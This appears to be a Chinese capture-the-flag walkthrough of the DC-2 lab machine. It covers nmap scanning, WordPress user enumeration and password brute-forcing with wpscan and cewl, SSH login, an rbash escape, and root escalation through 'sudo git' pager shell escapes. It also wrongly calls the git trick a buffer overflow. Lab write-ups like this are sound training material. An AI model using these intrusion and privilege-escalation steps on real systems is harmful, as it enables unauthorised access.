一、信息收集

1、主機探測

arp-scan?-l
探測同網段

2、端口掃描

nmap -sS -sV 192.168.66.136

80/tcp???open??http????Apache?httpd?2.4.10?((Debian))
7744/tcp?open??ssh?????OpenSSH?6.7p1?Debian?5+deb8u7?(protocol?2.0)

這里是掃描出來兩個端口，80和ssh，先掃一下目錄然后訪問80端口

3、目錄掃描

二、外網打點

Flag1

這是我們掃描出來的目錄，訪問去看看

如果訪問重定向報錯記得在/etc/hosts中添加ip即可，在windows中的C:/Windows/System32/drivers/etc/HOSTS中添加ip dc-2即可成功

[15:46:20]?200?-???18KB?-?/index.php????????????????????????????????????????
[15:46:21]?200?-????7KB?-?/license.txt??????????????????????????????????????
[15:46:28]?200?-????3KB?-?/readme.html??????????????????????????????????????
[15:46:36]?200?-????0B??-?/wp-content/??????????????????????????????????????
[15:46:37]?200?-???84B??-?/wp-content/plugins/akismet/akismet.php???????????
[15:46:37]?200?-????0B??-?/wp-config.php
[15:46:37]?200?-????1B??-?/wp-admin/admin-ajax.php??????????????????????????
[15:46:37]?200?-??528B??-?/wp-admin/install.php?????????????????????????????
[15:46:37]?200?-????4KB?-?/wp-includes/?????????????????????????????????????
[15:46:37]?200?-????1KB?-?/wp-login.php?????????????????????????????????????
[15:46:37]?200?-????0B??-?/wp-cron.php???

在該目錄下找到了Flag1，接著找下一個

Flag2

這里我們使用cewl爬了一個字典，估計是拿這個字典去爆登錄頁面

指紋掃出來時wp，使用wpsacn爆一下

結果爆出來了，admin、jerry、tom三個賬戶，我們把它放進一個txt中當作字典去爆

這里掃描除了賬戶對應密碼，我們去看看

我們在jerry/adipiscing這組賬戶密碼中得到了Flag2

到這里就要換方向了，我們去看ssh

Flag3

這里我們找到了flag3

不過這里我們遇到了-rbash，這個含義就是說我們的bash是不完整的，很多命令無法執行，無法操作，我們需要繞過

把/bin/bash給a變量,繞過首先的shellBASH_CMDS[a]=/bin/sh;a#使用并添加環境變量，將/bin 作為PATH環境變量導出export PATH=$PATH:/bin/ #將/usr/bin作為PATH環境變量導出export PATH=$PATH:/usr/bin

flag4

這里我們使用su jerry就能進入到jerry用戶，這里tom寫的環境變量需要等一等才能生效，在我這里如果執行了環境變量直接到jerry用戶會報錯。然后我們進入到jerry目錄就能發現了flag4

Flag5

這里作者給了提示git提權 git提權的原理是git存在緩沖區溢出漏洞，在使用sudo git -p help時，不需要輸入root密碼既可以執行這條命令。以下有兩種方法：

1、sudo git help config,然后在末行輸入!/bin/bash或!'sh'完成提權。 2、sudo git -p help，然后輸入!/bin/bash,即可打開一個root的shell。 不得不說這個靶場很經典，每個git提權都是以這臺靶機作為實例

提權成功

最后在root目錄下找到了最后一個flag

完結！！！